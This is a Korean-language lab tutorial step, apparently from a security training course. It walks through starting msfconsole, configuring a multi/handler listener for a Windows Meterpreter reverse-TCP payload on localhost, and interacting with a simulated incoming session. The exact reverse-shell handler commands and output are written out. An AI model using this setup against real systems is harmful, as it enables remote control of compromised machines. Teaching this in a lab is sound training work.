Windows 대상 시스템에서 Meterpreter 세션 설정
이 단계에서는 Meterpreter 세션을 확보하는 과정을 시뮬레이션합니다. 먼저 Metasploit Framework 콘솔을 시작하고 감염된 기기에서 들어오는 연결을 "수신"할 리스너를 구성해야 합니다.
터미널을 열고 배너를 피하기 위해 quiet 모드로 Metasploit 콘솔을 시작합니다.
msfconsole -q
msfconsole 프롬프트에 들어간 후, 일반적인 multi/handler 모듈을 사용할 것입니다. 이 모듈은 다양한 페이로드로부터 들어오는 연결을 처리하도록 설계되었습니다.
use multi/handler
다음으로, 핸들러가 어떤 페이로드를 예상하는지 알려주어야 합니다. 이 랩에서는 표준 Windows Meterpreter reverse TCP 페이로드를 사용할 것입니다.
set payload windows/meterpreter/reverse_tcp
리스너의 IP 주소 (LHOST) 와 포트 (LPORT) 도 구성해야 합니다. LHOST는 127.0.0.1(localhost) 으로, LPORT는 4444로 설정합니다.
set LHOST 127.0.0.1
set LPORT 4444
이제 exploit 명령을 실행하여 리스너를 시작합니다. -j 플래그를 사용하여 백그라운드 작업으로 실행하면 msfconsole 프롬프트가 다른 명령을 위해 계속 사용 가능하게 됩니다.
exploit -j
핸들러가 시작되었다는 확인 메시지가 표시될 것입니다.
[*] Exploit running as background job 0.
[*] Started reverse TCP handler on 127.0.0.1:4444
이 랩에서는 백그라운드 프로세스가 이제 감염된 Windows 호스트가 귀하에게 다시 연결하는 것을 시뮬레이션합니다. 잠시 후 Meterpreter 세션이 열렸다는 메시지가 표시될 것입니다.
[*] Meterpreter session 1 opened (127.0.0.1:4444 -> 127.0.0.1:49152) at YYYY-MM-DD HH:MM:SS +0000
이 새 세션과 상호 작용하려면 sessions 명령에 -i 플래그와 세션 ID 를 차례로 사용합니다.
sessions -i 1
프롬프트가 meterpreter>로 변경되어 대상 시스템의 Meterpreter 세션 내부에 있음을 나타냅니다.
meterpreter >